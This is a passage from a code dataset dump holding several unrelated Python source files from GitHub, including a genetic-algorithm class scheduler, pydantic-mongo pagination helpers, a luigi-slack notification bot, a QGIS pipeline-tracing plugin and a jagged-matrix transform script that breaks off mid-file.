metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jefersoncmn/Genetic-Algorithm",
"score": 3
}
|
#### File: Genetic-Algorithm/src/leituraDeArquivo.py
```python
import pandas as pd
import json
def ler_json(arq_json):
with open(arq_json, 'r', encoding='utf8') as f:
return json.load(f)
def ler_materia_no_json(json_data, line):
materia = json_data[line]
return materia
def ler_dado_da_materia_no_json(json_data, line, key):
dado = json_data[line][key]
return dado
```
#### File: Genetic-Algorithm/src/metodoDeSelecao.py
```python
import random
from modelos.individuo import Individuo
from modelos.materia import Materia
#Na seleção por torneio, três indivíduos são selecionados aleatoriamente e os dois
#com os maiores fitness são selecionados para terem seus genes propagados. Na seleção
#por truncamento, o valor do limiar utilizado foi 0.4, ou seja, apenas os 40% melhores
#indivíduos podem ser selecionados para participarem das próximas etapas.
#geracao = lista de todos individuos da geracao
def selecao_por_truncamento(geracao : Individuo, valor_do_limiar : float) -> Individuo:
valor = regra_de_tres(len(geracao), valor_do_limiar*100)
#print("valor de itens de acordo com a limiar "+str(valor_do_limiar)+" quantidade: "+str(valor))
return retornar_maiores_fitness(geracao, valor)
def selecao_por_torneio(geracao : Individuo, quantidade_de_selecionados : int, quantidade_de_genes_propagados : int):
lista_de_individuos_selecionados_no_torneio : Individuo = []
while len(lista_de_individuos_selecionados_no_torneio) < 300:
lista_de_individuos_selecionados : Individuo = []
for individuo in range(len(geracao)):
random.seed()
if len(lista_de_individuos_selecionados) <= quantidade_de_selecionados:
if random.randint(0,1) == 0:
lista_de_individuos_selecionados.append(geracao[individuo])
lista_de_individuos_selecionados_no_torneio.extend(retornar_maiores_fitness(lista_de_individuos_selecionados, quantidade_de_genes_propagados))
return lista_de_individuos_selecionados_no_torneio
def retornar_maiores_fitness(geracao : Individuo, quantidade_a_ser_retornada : int) -> Individuo:
maiores_valores : Individuo = []
maior_valor : Individuo
for x in range(quantidade_a_ser_retornada):
maior_valor = geracao[0]
for individuo in range(len(geracao)):
if maior_valor.fitness < geracao[individuo].fitness:
maior_valor = geracao[individuo]
maiores_valores.append(maior_valor)
geracao.remove(maior_valor)
return maiores_valores
def atribuir_fitness_a_geracao(geracao : Individuo):
for individuo in range(len(geracao)): #Percorre os individuos
atribuir_fitness(geracao[individuo])
return geracao
def atribuir_fitness(individuo : Individuo):
punicoes : int = 0
for materia in range(len(individuo.lista_de_materias)):
punicoes += individuo.lista_de_materias[materia].punicao
#print("materia: "+individuo.lista_de_materias[materia].nome+" tem punicao de: "+ str(individuo.lista_de_materias[materia].punicao))
individuo.fitness = calcular_fitness(punicoes)
def calcular_fitness(punicao : int) -> float:
return 100/(100 + punicao)
def regra_de_tres(quantidade : int, porcentagem : int) -> int:
return int((quantidade*porcentagem)/100)
```
#### File: src/modelos/individuo.py
```python
from modelos.materia import Materia
class Individuo:
id : int
lista_de_materias : Materia = []
fitness : float
#Restrições feridas
sobreposicao_de_aulas : int = 0
dependencias_desordenadas : int = 0
conflito_de_horario_de_professor : int = 0
def __init__(self, id : int , lista_de_materias : Materia):
self.id = id
self.lista_de_materias = lista_de_materias
```
|
{
"source": "jefersondaniel/phoopy",
"score": 2
}
|
#### File: phoopy/test/test_init.py
```python
class TestInit(object):
def test_init(self):
assert 1 == True
```
|
{
"source": "jefersondaniel/pydantic-mongo",
"score": 2
}
|
#### File: pydantic-mongo/pydantic_mongo/pagination.py
```python
from .errors import PaginationError
from base64 import b64decode, b64encode
from bson import ObjectId
from pydantic import BaseModel
from pydantic.generics import GenericModel
from typing import Generic, TypeVar, Any, List
import bson
import zlib
DataT = TypeVar('DataT')
class Edge(GenericModel, Generic[DataT]):
node: DataT
cursor: str
class Config:
json_encoders = {ObjectId: str}
def encode_pagination_cursor(data: List) -> str:
byte_data = bson.BSON.encode({'v': data})
byte_data = zlib.compress(byte_data, 9)
return b64encode(byte_data).decode('utf-8')
def decode_pagination_cursor(data: str) -> List:
try:
byte_data = b64decode(data.encode('utf-8'))
byte_data = zlib.decompress(byte_data)
result = bson.BSON(byte_data).decode()
return result['v']
except Exception:
raise PaginationError('Invalid cursor')
def get_pagination_cursor_payload(model: BaseModel, keys: List[str]) -> List[Any]:
model_dict = model.dict()
model_dict['_id'] = model_dict['id']
return [
__evaluate_dot_notation(model_dict, key) for key in keys
]
def __evaluate_dot_notation(data: Any, path: str):
pieces = path.split('.')
if len(pieces) == 1:
return data[path]
current_data = data
for piece in pieces:
if isinstance(current_data, list) or isinstance(current_data, tuple):
current_data = current_data[int(piece)]
else:
current_data = current_data[piece]
return current_data
```
#### File: pydantic-mongo/test/test_pagination.py
```python
import datetime
from bson import ObjectId
from pydantic_mongo.pagination import encode_pagination_cursor, decode_pagination_cursor, get_pagination_cursor_payload
from pydantic import BaseModel
from typing import List
class Foo(BaseModel):
count: int
size: float = None
class Bar(BaseModel):
apple = 'x'
banana = 'y'
class Spam(BaseModel):
id: str = None
foo: Foo
bars: List[Bar]
class Config:
json_encoders = {ObjectId: str}
class TestPagination:
def test_get_pagination_cursor_payload(self):
spam = Spam(id='lala', foo=Foo(count=1, size=1.0), bars=[Bar()])
values = get_pagination_cursor_payload(spam, ['_id', 'id'])
assert values[0] == 'lala'
assert values[1] == 'lala'
values = get_pagination_cursor_payload(spam, ['foo.count'])
assert values[0] == 1
values = get_pagination_cursor_payload(spam, ['bars.0.apple'])
assert values[0] == 'x'
def test_cursor_encoding(self):
old_value = [ObjectId('611b158adec89d18984b7d90'), 'a', 1]
cursor = encode_pagination_cursor(old_value)
new_value = decode_pagination_cursor(cursor)
assert old_value == new_value
```
|
{
"source": "jefersongrandi/luigi-slack",
"score": 2
}
|
#### File: luigi-slack/luigi_slack/api.py
```python
import os
import logging
import inspect
from contextlib import contextmanager
from collections import defaultdict
import luigi
from luigi_slack.slack_api import SlackAPI
from luigi_slack.events import SUCCESS
from luigi_slack.events import MISSING
from luigi_slack.events import FAILURE
from luigi_slack.events import START
from luigi_slack.events import PROCESSING_TIME
from luigi_slack.events import event_label
log = logging.getLogger('luigi_slack')
log.setLevel(logging.DEBUG)
class SlackMessage(object):
def __init__(self, title=None, fields={}, success=None):
self.title = title
self.fields = fields
self.success = success
class SlackBot(object):
def __init__(self,
token,
channels=[],
events=[FAILURE],
max_events=5,
username='Luigi-slack Bot',
as_user=False,
use_private_channels=True,
task_representation=str,
print_env=[]):
if not isinstance(events, list):
raise ValueError('events must be a list, {} given'.format(type(events)))
if not channels:
log.info('SlackBot(channels=[]): notifications are not sent')
self.events = events
self._events_to_handle = self.events + [SUCCESS, START]
self.client = SlackAPI(token, username, as_user, use_private_channels=use_private_channels)
self.channels = channels
self.max_events = max_events
self.event_queue = defaultdict(list)
self.task_repr = task_representation
self._print_env = print_env
def send_notification(self):
message = self._format_message()
post_to = self.channels
if message:
self.client.bulk_message(message, post_to)
return True
def set_handlers(self):
self._init_handlers()
for event in self._events_to_handle:
if event not in self._event_handlers:
raise ValueError("{} is not a valid event type".format(event))
handler = self._event_handlers[event]['luigi_handler']
function = self._event_handlers[event]['function']
luigi.Task.event_handler(handler)(function)
return True
def _init_handlers(self):
self._event_handlers = {
SUCCESS: {
'luigi_handler': luigi.Event.SUCCESS,
'function': self._success
},
FAILURE: {
'luigi_handler': luigi.Event.FAILURE,
'function': self._failure
},
START: {
'luigi_handler': luigi.Event.START,
'function': self._start
},
MISSING: {
'luigi_handler': luigi.Event.DEPENDENCY_MISSING,
'function': self._missing
},
PROCESSING_TIME: {
'luigi_handler': luigi.Event.PROCESSING_TIME,
'function': self._processing_time
}
}
def _success(self, task):
task = self.task_repr(task)
self.event_queue[FAILURE] = [fail for fail in self.event_queue[FAILURE] if task != fail['task']]
self.event_queue[MISSING] = [miss for miss in self.event_queue[MISSING] if task != miss]
self.event_queue[SUCCESS].append(task)
def _failure(self, task, exception):
task = self.task_repr(task)
failure = {'task': task, 'exception': str(exception)}
self.event_queue[FAILURE].append(failure)
def _missing(self, task):
task = self.task_repr(task)
self.event_queue[MISSING].append(task)
def _start(self, task):
task = self.task_repr(task)
self.event_queue[START].append(task)
def _processing_time(self, task):
raise NotImplementedError
# task = self.task_repr(task)
# self.event_queue[PROCESSING_TIME].append(task)
def _format_message(self):
job = os.path.basename(inspect.stack()[-1][1])
title = "*Status report for {}*".format(job)
if self._only_success():
if SUCCESS in self.events:
messages = {event_label(SUCCESS): ["Job ran successfully!"]}
success = True
else:
return None
else:
messages = self._event_messages()
success = False
if self._print_env:
env_to_print = ["{}={}".format(env_var, os.environ.get(env_var, ''))
for env_var in self._print_env]
messages['Environment'] = env_to_print
return SlackMessage(title=title, fields=messages, success=success)
def _only_success(self):
return len(self.event_queue[SUCCESS]) == len(self.event_queue[START])
def _event_messages(self):
messages = {}
for event_type in self.events:
if event_type in self.event_queue:
label = event_label(event_type)
if not self.event_queue[event_type]:
messages[label] = ['none']
elif len(self.event_queue[event_type]) > self.max_events:
messages[label] = ["more than {} events, check logs.".format(self.max_events)]
else:
messages[label] = []
for event in self.event_queue[event_type]:
try:
# only "failure" is a dict
msg = "Task: {}; Exception: {}".format(event['task'], event['exception'])
messages[label].append("Task: {}; Exception: {}".format(event['task'], event['exception']))
except TypeError:
# all the other events are str
messages[label].append(event)
return messages
@contextmanager
def notify(slacker):
slacker.set_handlers()
yield
slacker.send_notification()
```
|
{
"source": "jefersonjlima/robotics-codes",
"score": 3
}
|
#### File: temperature_sensor/script/app_node.py
```python
import rospy
from std_msgs.msg import Float64
class App:
def __init__(self):
rospy.init_node('py_app_node', anonymous=False)
rospy.Subscriber('sensor/value', Float64, self.update)
self.value = Float64()
def update(self, msg):
self.value.data = msg.data
rospy.loginfo(f"I heard: {self.value.data}")
def run(self):
rospy.spin()
if __name__ == "__main__":
try:
app = App()
app.run()
except rospy.ROSInterruptException:
pass
```
|
{
"source": "jefersonmontalvao/Sakurajima-BOT",
"score": 3
}
|
#### File: sakurajima/core/logger.py
```python
import logging
from sakurajima.conf import LOG_CONFIG
__all__ = ['get_logger']
# Define a basic configurations of logging. This is imported from conf.settings.py file.
LEVELS = {'NOTSET', 'DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'}
FORMAT = LOG_CONFIG['FORMAT']
if (LEVEL := LOG_CONFIG['LEVEL'].upper()) in LEVELS:
# Set the log format and settings
logging.basicConfig(format=FORMAT, level=getattr(logging, LEVEL))
# Using a file as logger.
# logging.basicConfig(filename='debug.log', format=FORMAT, level=getattr(logging, LEVEL))
else:
raise ValueError('LOG_CONFIG value "%s" is invalid.' % LOG_CONFIG.get('LEVEL'))
# Simplified way to get logger.
def get_logger(name='default'):
"""Return the logger with name value automatically or editable by name param."""
name = locals().get('__name__') if name == 'default' else name
return logging.getLogger(name)
```
|
{
"source": "Jefersonnnn/tracing_qgis",
"score": 2
}
|
#### File: Jefersonnnn/tracing_qgis/tracing.py
```python
from qgis.PyQt.QtGui import *
from qgis.PyQt.QtWidgets import *
from qgis.core import (
Qgis,
QgsMessageLog,
QgsProject,
QgsApplication)
import os
from core.task_manager import TracingCAJ
class Tracing:
def __init__(self, iface):
# save reference to the QGIS interface
self.iface = iface
self.__pipeline = None
self.__valves = None
# Initialize plugin directory
self.__tm = QgsApplication.taskManager()
self.plugin_dir = os.path.dirname(__file__)
self.icon_folder = self.plugin_dir + os.sep + 'icons' + os.sep
def initGui(self):
# create action that will start plugin configuration
self._set_info_button()
self.action.setObjectName("TracingAction")
self.action.setStatusTip("Start tracing from selected pipeline")
self.action.triggered.connect(self.run)
# add toolbar button and menu item
self.iface.addToolBarIcon(self.action)
self.iface.addPluginToMenu("&Tracing plugins", self.action)
def unload(self):
# remove the plugin menu item and icon
self.iface.removePluginMenu("&Tracing plugins", self.action)
self.iface.removeToolBarIcon(self.action)
def run(self):
self.__pipeline = QgsProject.instance().mapLayersByName('pipelines_tracing')
self.__valves = QgsProject.instance().mapLayersByName('valves_tracing')
if len(self.__pipeline) > 0 and len(self.__valves) > 0:
pipeline_select = self.iface.activeLayer().selectedFeatures()
if pipeline_select:
if len(pipeline_select) == 1:
tracing_caj = TracingCAJ(self.__tm, self.__pipeline, self.__valves)
tracing_caj.start()
else:
self.iface.messageBar().pushMessage("Info",
"Select only ONE network to start", level=Qgis.Info)
print('Info - Select only ONE network to start')
else:
self.iface.messageBar().pushMessage("Info", 'Rename layers for "pipelines_tracing" and "valves_tracing" '
, level=Qgis.Info)
print('Rename layers for "pipelines_tracing" and "valves_tracing"')
def error(self):
self.iface.messageBar().pushMessage("Error occorred",
"Error",
level=Qgis.Critical)
QgsMessageLog.logMessage('Error occurred')
def _set_info_button(self):
""" Set main information button (always visible) """
icon_path = self.icon_folder + 'tracingcaj.png'
if os.path.exists(icon_path):
icon = QIcon(icon_path)
self.action = QAction(icon, "Start Tracing", self.iface.mainWindow())
else:
self.action = QAction("Start Tracing", self.iface.mainWindow())
# add toolbar button and menu item
self.iface.addToolBarIcon(self.action)
```
|
{
"source": "JefersonSMAlmeida/zdsync",
"score": 3
}
|
#### File: zdsync/zdsync/printer.py
```python
import math
import shutil
class Printer(object):
def __init__(self, synchronizer):
self._synchronizer = synchronizer
def output(self):
print(
"""The following {plural} only exist in the sandbox:
{}
The following {plural} only exist in production:
{}
The following {plural} are different between environments:
{}
There are {} other {plural} that are the same between environments.
""".format(
self.in_columns(self._synchronizer.only_in_sandbox),
self.in_columns(self._synchronizer.only_in_production),
self.in_columns(self._synchronizer.in_both_but_different),
len(
set(self._synchronizer.in_both).difference(
self._synchronizer.in_both_but_different
)
),
plural="{}s".format(self._synchronizer.api_object.__name__)
)
)
def in_columns(self, values):
if not values:
return ""
width = shutil.get_terminal_size().columns
max_size = max([len(str(value)) for value in values])
columns = max(
1,
min([math.floor(width / (max_size + 1)), len(values)])
)
column_width = math.floor(width / columns)
return "\n".join(
"".join(
[
str(value).ljust(column_width)
for value in values[start:start + columns]
]
)
for start in range(0, len(values), columns)
)
```
|
{
"source": "jefersonsv/Thunder",
"score": 3
}
|
#### File: benchmarks/python3-flask/hello.py
```python
from flask import Flask
app = Flask(__name__)
import logging
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
@app.route("/hello")
def hello():
return "Hello from /hello"
```
|
{
"source": "JefersonTS/Algoritmos-em-Python",
"score": 4
}
|
#### File: JefersonTS/Algoritmos-em-Python/Calculadora.py
```python
print('\nEscolha uma das opcoes abaixo.\n')
print('A _ Calcular a tabuada de um número de 1 a 9;')
print('B _ Calcular o índice de massa corporal;')
print('C _ Calcular o fatorial de um número inteiro;')
print('D _ Descobrir o menor elemento de um vetor;')
print('E _ Obter a média dos elementos ímpares de um vetor de 20 posições.')
print('_'*70)
opc = ''
while(opc == ''):
opc = str(raw_input('Informe sua opção: ')).lower().strip()
print(' ')
if(opc !='a' and opc !='b' and opc !='c' and opc !='d' and opc !='e'):
print('Informe uma opção válida.\n')
if(opc == 'a'):
def calcular_tabuada(_numero):
numero = int(_numero)
if(numero <= 0):
print('Informe um número inteiro entre 1 e 10.')
if(numero > 10):
print('Informe um número inteiro entre 1 e 9.')
if(numero >= 1 and numero <= 10):
for i in range(1,11):
print i,"*" ,numero, "=" ,i*numero
numero_escolhido = int(input('Informe o número: '))
print(' ')
enviar_tabuada = calcular_tabuada(numero_escolhido)
if(opc == 'b'):
def calcular_IMC(_peso,_altura):
def_peso = float(_peso)
def_altura = float(_altura)
IMC = def_peso/(def_altura**def_altura)
return IMC
peso = float(input('Informe o seu peso: '))
print(' ')
altura = float(input('Informe a sua altura: '))
print(' ')
dados_IMC = calcular_IMC(peso, altura)
print('O seu IMC é de {} \n'.format(dados_IMC))
if(opc == 'c'):
def calcular_fatorial(_numero):
numero = _numero
fatorial = 1
for i in range(1, numero + 1):
fatorial *= i
return fatorial
escolha_numero = int(input('Informe o número: '))
print(' ')
result = calcular_fatorial(escolha_numero)
print('O fatorial de {} e igual a {}'.format(escolha_numero, result))
print(' ')
if(opc == 'd'):
def menor_elemento(_vetor):
vetor = _vetor
menorvalor = min(vetor)
return menorvalor
tamanhovetor = int(input('Informe o tamanho do vetor: '))
print(' ')
vetor1 = []
for i in range(0, tamanhovetor):
vetor1.append(float(input('Informe o valor da {} posição do vetor: ' .format(i+1) )))
resultado = menor_elemento(vetor1)
print(' ')
print('O menor elemento do vetor é {} \n'.format(int(resultado)))
if(opc == 'e'):
def media_impar(total_impar, quantidade_impar):
totalimpar = total_impar
quantidadeimpar = quantidade_impar
mediaimpar = totalimpar/quantidadeimpar
return mediaimpar
vet = []
totimpar = 0
qtdimpar = 0
for i in range(0,20):
vet.append(int(input('Informe o valor da {} posição: '.format(i+1))))
for i in range(0, 20):
if(vet[i] % 2 == 1):
totimpar += vet[i]
qtdimpar += 1
print(' ')
media = media_impar(totimpar, qtdimpar)
print('A média dos elementos ímpares do vetor é de',media)
break
```
|
{
"source": "Jefesonk1/ACC",
"score": 3
}
|
#### File: Jefesonk1/ACC/new.py
```python
import numpy as np
import openpyxl
import math
import random as rd
def extractFromFile(filename,min_r,min_c,max_r,max_c):
book=openpyxl.load_workbook(filename)
sheet=book.active
data=[]
temp=[]
for row in sheet.iter_rows(min_row=min_r, min_col=min_c, max_row=max_r, max_col=max_c):
for cell in row:
temp.append(cell.value)
data.append(temp.copy())
temp.clear()
return data
def calcDist(data,x,y):
max_c=len(data[0])
z=0
for i in range(max_c):
z+=((data[x][i]-data[y][i])**2)
z=math.sqrt(z)
#print(z)
return z
def makeGrid(data):
index=[]
siz=len(data)
grid=np.full((math.floor(math.sqrt(10*siz)),math.floor(math.sqrt(10*siz))),-1)
#print(rd.randrange(0,22))
for i in range(siz):
while True:
a=rd.randrange(0,len(grid)-1)
b=rd.randrange(0,len(grid)-1)
if grid[a][b] == -1:
grid[a][b]=i
index.append([a,b])
break
return grid,index
def normalize(data):
lenx=len(data)
leny=len(data[0])
z=np.zeros((lenx,leny))
arrMax=np.zeros(leny)
arrMin=np.zeros(leny)
for j in range(leny):
i_max=np.argmax(data[:,j])
arrMax[j]=data[i_max][j]
i_min=np.argmin(data[:,j])
arrMin[j]=data[i_min][j]
for i in range(lenx):
for j in range(leny):
z[i][j]=(data[i][j]-arrMin[j])/(arrMax[j]-arrMin[j])
return z
def move(ant,grid,index,indexPos):
possibilities=[-1,0,1]
oldData=grid[ant[0],ant[1]]
oldPos=ant.copy()
c_ant=ant.copy()
while True:
x=possibilities[rd.randrange(0,3)]
y=possibilities[rd.randrange(0,3)]
c_ant[0]+=x
c_ant[1]+=y
c_ant=np.mod(c_ant, (len(grid),len(grid)))
if grid[c_ant[0],c_ant[1]]==-1:
grid[c_ant[0],c_ant[1]]=oldData
grid[oldPos[0],oldPos[1]]=-1
index[indexPos]=[c_ant[0],c_ant[1]]
return c_ant
def getNeighborhood(data,grid,x,y,s,alpha):
'''print('inicio{}'.format(grid[x][y]))
print('x{}'.format(x))
print('y{}'.format(y))'''
s=math.floor((s-1)/2)
y_s = y - s
x_s = x - s
total = 0.0
for i in range((s*2)+1):
xi = (x_s + i) % len(grid)
for j in range((s*2)+1):
if j != x and i != y:
yj = (y_s + j) % len(grid)
o = grid[xi][yj]
if o is not None and o !=-1 and grid[x,y]!=o:
'''print('\n')
print('valor coordenada passada{}'.format(grid[x,y]))
print('valor coordenada achada{}'.format(grid[xi,yj]))
print('\n')'''
dist=calcDist(data,grid[x,y],grid[xi,yj])/alpha
total+=(1-dist)
if (1/(s**2))*total>0:
return (1/(s**2))*total
else:
return 0
def pPick(data,grid,x,y,s,kp,alpha):
prob=np.random.sample()
if prob < (kp/(kp+getNeighborhood(data,grid,x,y,s,alpha)))**2:
return True
return False
def pDrop(data,grid,x,y,s,kd,alpha):
prob=np.random.sample()
if prob < ((getNeighborhood(data,grid,x,y,s,alpha))/(kd+(getNeighborhood(data,grid,x,y,s,alpha))))**2:
return True
return False
def ACC(data,kp,kd,alpha,s,its):
contador=0
index=[]#indices que contem dados na matriz
z=normalize(data)
grid,index=makeGrid(z)
print(grid)
print('\n')
print(index)
indexPos=rd.randrange(0,len(index))
ant=index[indexPos]
while True:
ant=move(ant,grid,index,indexPos)
drop=pDrop(z,grid,ant[0],ant[1],s,kd,alpha)
#print(drop)
if drop:
pick=False
while not pick:
indexPos=rd.randrange(0,len(index))
ant=index[indexPos]
if pPick(z,grid,ant[0],ant[1],s,kp,alpha):
pick=True
contador+=1
if contador>=its:
break
print('\n')
print(grid)
print('\n')
print(index)
return grid
#print('\n')
def main():
filename="Dados Para Agrupamento.xlsx"
a=extractFromFile(filename,2,1,29,2)
b=extractFromFile(filename,2,3,29,6)
arr=np.asarray(b, dtype=np.float32)
kp=0.8
kd=0.3
alpha=0.5
s=3
its=500
jog=ACC(arr,kp,kd,alpha,s,its)
for i in range(len(jog)):
for j in range(len(jog)):
pass
for i in range(len(a)):
print('{} {} {}'.format(i,a[i][1], a[i][0]))
if __name__ == '__main__':
main()
```
|
{
"source": "Jefesonk1/cNatural",
"score": 3
}
|
#### File: Jefesonk1/cNatural/trabalho12.py
```python
import numpy as np
import random as rd
import matplotlib.pyplot as plt
def zakh(n):
beg=0
a=sum([(x**2) for x in n])
c=0
b=0
size=len(n)
while beg<size:
b+=0.5*(beg+1)*n[beg]
c+=0.5*(beg+1)*n[beg]
beg+=1
return a+(b**2)+(c**4)
def cruzamento(old,NP,n,new):
U=np.zeros(shape=[NP,n])
print(U)
def DE(NP,CR,F,n,gen):
pop=np.zeros(shape=[NP,n])
for x in range(NP):
for y in range(n):
pop[x][y]=rd.uniform(-5, 10)
newpop=muta(pop,NP,n,F)
cruzamento(pop,NP,n,newpop)
def muta(pop,NP,n,F):
newpop=np.zeros(shape=[NP,n])
for x in range (NP):
result = rd.sample(range(0,NP-1),3)
newpop[x]=pop[result[0]]+F*(pop[result[1]]+pop[result[2]])
return newpop
def main():
DE(40,0.3,0.2,2,50)
if __name__ == '__main__':
main()
```
|
{
"source": "jeff00seattle/facebook-api-scripts",
"score": 3
}
|
#### File: scripts/py_sources/pandas_to_report.py
```python
import pandas as pd
def df_nested_html_table(values):
if values == '':
return values
json_values = values
df_row_values = pd.io.json.json_normalize(json_values)
df_row_values = df_row_values.replace("\n", "", regex=True)
df_row_values = df_row_values.sort_values(df_row_values.columns[0], ascending=False)
html_row_table = df_row_values.to_html(index=False)
return html_row_table.replace('\n', '').replace('\r', '')
def df_nested_excel(values):
if values == '':
return values
json_values = values
df_row_values = pd.io.json.json_normalize(json_values)
df_row_values = df_row_values.replace("\n", "", regex=True)
df_row_values = df_row_values.sort_values(df_row_values.columns[0], ascending=False)
excel_row_table = df_row_values.to_excel(encoding='utf-8', index=False, float_format='%.2f')
return excel_row_table.replace('\n', '').replace('\r', '')
```
|
{
"source": "jeff00seattle/logging-fortified",
"score": 2
}
|
#### File: pyfortified_logging/errors/errors_traceback.py
```python
import sys
import traceback
def get_exception_message(ex):
"""Build exception message with details.
"""
template = "{0}: {1!r}"
return template.format(type(ex).__name__, ex.args)
def print_traceback(ex):
exc_type, exc_value, exc_tb = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_tb)
def print_limited_traceback(ex, limit=1):
exc_type, exc_value, exc_tb = sys.exc_info()
traceback.print_exc(limit=1, file=sys.stdout)
def print_traceback_stack():
"""Provide traceback of provided exception.
"""
exception_list = traceback.format_stack()
exception_list = exception_list[:-2]
exception_list.extend(traceback.format_tb(sys.exc_info()[2]))
exception_list.extend(traceback.format_exception_only(sys.exc_info()[0], sys.exc_info()[1]))
exception_str = "Traceback (most recent call last):\n"
exception_str += "".join(exception_list)
# Removing the last \n
exception_str = exception_str[:-1]
print(exception_str)
```
|
{
"source": "jeff00seattle/matrix-transform",
"score": 3
}
|
#### File: jeff00seattle/matrix-transform/matrix_transform_A.py
```python
import sys
import getopt
import logging
import random
import string
import json
import copy
class JaggedMatrixGenerator(object):
"""Generate a Jagged Matrix and fill it with random characters as defined by available string sequences.
"""
SEQUENCE = ["ascii_letters", "ascii_lowercase", "ascii_uppercase",
"digits", "hexdigits", "octdigits", "printable", "punctuation",
"whitespace"]
@classmethod
def _sequence(cls, sequence):
assert sequence in cls.SEQUENCE
if "ascii_letters" == sequence:
return string.ascii_letters
if "ascii_lowercase" == sequence:
return string.ascii_lowercase
if "ascii_uppercase" == sequence:
return string.ascii_uppercase
if "digits" == sequence:
return string.digits
if "hexdigits" == sequence:
return string.hexdigits
if "octdigits" == sequence:
return string.octdigits
if "printable" == sequence:
return string.printable
if "punctuation" == sequence:
return string.punctuation
if "whitespace" == sequence:
return string.whitespace
@property
def matrix(self):
return self.__matrix
@matrix.setter
def matrix(self, value):
self.__matrix = value
#
# Initialize
#
def __init__(self, kw={}):
"""Initialize
"""
cls = self.__class__
self.matrix = None
self.row_length_min = kw.get("row-length-min", 4)
self.row_length_max = kw.get("row-length-max", 8)
assert(self.row_length_max >= self.row_length_min)
self.rows_count_min = kw.get("rows-count-min", 4)
self.rows_count_max = kw.get("rows-count-max", 8)
assert(self.rows_count_max >= self.rows_count_min)
self.sequence = cls._sequence(kw.get("sequence", "ascii_uppercase"))
def __str__(self):
"""Pretty print plain rows with seat reservations
"""
assert self.matrix
s = [[str(e) for e in row] for row in self.matrix]
lens = [max(map(len, col)) for col in zip(*s)]
fmt = "\t".join("{{:{}}}".format(x) for x in lens)
table = [fmt.format(*row) for row in s]
return "\n" + "\n".join(table)
def generate(self):
self.matrix = [[random.choice(self.sequence)
for _ in range(random.randint(self.row_length_min, self.row_length_max))]
for _ in range(random.randint(self.rows_count_min, self.rows_count_max))]
return self.matrix
@staticmethod
def serialize(matrix):
assert matrix
return json.dumps(matrix)
@staticmethod
def deserialize(matrix_serialize):
assert matrix_serialize
return json.loads(matrix_serialize)
class MatrixTransformA(object):
"""Transform rows and columns based upon matching target character.
"""
@property
def verbose(self):
return self.__verbose
@verbose.setter
def verbose(self, value):
self.__verbose = value
@property
def case_sensitive(self):
return self.__case_sensitive
@case_sensitive.setter
def case_sensitive(self, value):
self.__case_sensitive = value
@property
def matrix(self):
return self.__matrix
@matrix.setter
def matrix(self, value):
self.__matrix = value
@property
def matrix_transformed(self):
return self.__matrix_transformed
@matrix_transformed.setter
def matrix_transformed(self, value):
self.__matrix_transformed = value
@property
def target(self):
return self.__target
@target.setter
def target(self, value):
self.__target = value
@property
def logger(self):
return self.__logger
@logger.setter
def logger(self, value):
self.__logger = value
def _logger_config(self):
"""Logger config"""
self.logger = logging.getLogger("MatrixTransformation")
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.setLevel(logging.INFO)
if self.verbose:
self.logger.setLevel(logging.DEBUG)
#
# Initialize
#
def __init__(self, kw):
"""Initialize
"""
self.verbose = kw.get("verbose", False)
matrix_serialized = kw.get("matrix", None)
self.matrix = JaggedMatrixGenerator.deserialize(matrix_serialized) if matrix_serialized else None
self.target = kw.get("target", None)
self.case_insensitive = kw.get("case-insensitive", False)
self._logger_config()
def match_target(self, value):
return str(self.target).lower() == str(value).lower() if self.case_insensitive else self.target == value
def transform(self):
numrows_max = len(self.matrix) # Number rows in matrix
numcols_max = len(self.matrix[0]) # Number columns in first row of matrix
rows = [False for i in range(numrows_max)]
columns = [False for i in range(numcols_max)]
for i_row, v_row in enumerate(self.matrix):
# print("row: {}: {}".format(i_row, v_row))
for i_column, v_column in enumerate(v_row):
# print("column: {}: {}".format(i_column, v_column))
numcols = len(v_row)
# print(f"{numcols_max}:{numcols}:{i_column}")
if numcols_max < numcols:
extend_numcols = numcols - numcols_max
numcols_max = numcols
extend_columns = [False for i in range(extend_numcols)]
columns.extend(extend_columns)
# print("extending: ", columns)
if self.match_target(v_column):
rows[i_row] = True
columns[i_column] = True
self.logger.info("rows: {0}: {1}".format(numrows_max, rows))
self.logger.info("columns: {0}: {1}".format(numcols_max, columns))
self.matrix_transformed = copy.copy(self.matrix)
# print(self.present_transformed)
for i_row, v_row in enumerate(self.matrix_transformed):
for i_column, v_column in enumerate(v_row):
# self.logger.info(
# "{}: {}: {}".format(i_row, len(rows), rows)
# )
assert i_row >= 0
assert i_row < len(rows)
# self.logger.info(
# "{}: {}: {}".format(i_column, len(columns), columns)
# )
assert i_column >= 0
assert i_column < len(columns)
if rows[i_row] or columns[i_column]:
self.matrix_transformed[i_row][i_column] = self.target
@property
def present_original(self):
matrix_str = "\n"
for i_row, v_row in enumerate(self.matrix):
matrix_str += "{} : {}\n".format(i_row, v_row)
self.logger.info("Original JaggedMatrixGenerator:\n{0}\n".format(matrix_str))
@property
def present_transformed(self):
matrix_str = "\n"
for i_row, v_row in enumerate(self.matrix_transformed):
matrix_str += "{} : {}\n".format(i_row, v_row)
self.logger.info("Transformed JaggedMatrixGenerator:\n{0}\n".format(matrix_str))
def main():
matrix = ""
target = ""
sequence = "ascii_uppercase"
case_insensitive = False
usage = ("""Usage: {0}
[-v | --verbose]
[-h | --help]
--matrix string
--target string
--case-insensitive
--sequence {1}
--matrix: Strigified 2-D Jagged Array, If not provided then random is generated.
--target: Target matrix transformation with specific character [Required]
--case-insensitive: Be case-insensitive when targeting specific character, Default: {2}
--sequence: If random matrix is generated this uses this sequence, Default: '{3}'
""").format(sys.argv[0], JaggedMatrixGenerator.SEQUENCE, case_insensitive, sequence)
try:
opts, args = getopt.getopt(
sys.argv[1:],
"hv",
["help", "verbose", "matrix=", "target=", "case-insensitive", "sequence="])
except getopt.GetoptError as err:
# print help information and exit:
print(err) # will print something like "option -a not recognized"
print(usage)
sys.exit(1)
kw = {}
for opt, val in opts:
if opt in ("-v", "--verbose"):
kw["verbose"] = True
elif opt in ("-h", "--help"):
print(usage)
sys.exit(0)
elif opt in ("--matrix"):
kw["matrix"] = str(val)
elif opt in ("--target"):
